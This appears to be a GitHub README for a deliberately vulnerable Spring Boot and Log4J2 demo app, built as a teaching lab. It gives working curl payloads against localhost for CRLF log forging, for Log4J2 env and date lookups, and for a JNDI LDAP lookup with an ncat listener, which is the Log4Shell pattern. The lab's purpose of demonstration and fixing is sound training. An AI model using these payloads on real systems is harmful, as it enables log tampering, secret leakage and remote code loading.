Skip to content

This application is a demonstration prototype just to show how to perform Log Forging attack using CRLF Injection and JNDI injection

License

Notifications You must be signed in to change notification settings

0xdbe-appsec/log-injection-spring-boot-log4j2

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Log Injection with Spring Boot and Log4J2

Usage

  • Run
./gradlew bootRun
  • Request
curl http://localhost:8080/\?name\=Frodon

Hack

Using CRLF injection

curl http://localhost:8080/\?name\=Marty%0d%0a1985-10-30%2021%3A59%3A01.108%20DEBUG%20128537%20---%20%5Bnio-8080-exec-1%5D%20net.example.logging.HelloController%20%20%20%20%20%20%3A%20You%20have%20been%20pwed%0A

Using date lookup

Date lookup ${date:yyyyMMdd-HHmmss}:

curl http://localhost:8080/\?name\=%24%7Bdate%3AyyyyMMdd-HHmmss%7D

Using env lookup

Env lookup ${env:USER}:

curl http://localhost:8080/\?name\=%24%7Benv%3AUSER%7D

Using JNDI Injection

  • Run a listener
ncat -v -l -p 5000
  • JNDI LDAP lookup: Hello ${jndi:ldap://localhost:5000}%
curl http://localhost:8080/\?name\=%24%7Bjndi%3Aldap%3A%2F%2Flocalhost%3A5000%7D

Fix

Try to fix this app! Don't disable JNDI Lookup, this could be usefull.

About

This application is a demonstration prototype just to show how to perform Log Forging attack using CRLF Injection and JNDI injection

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages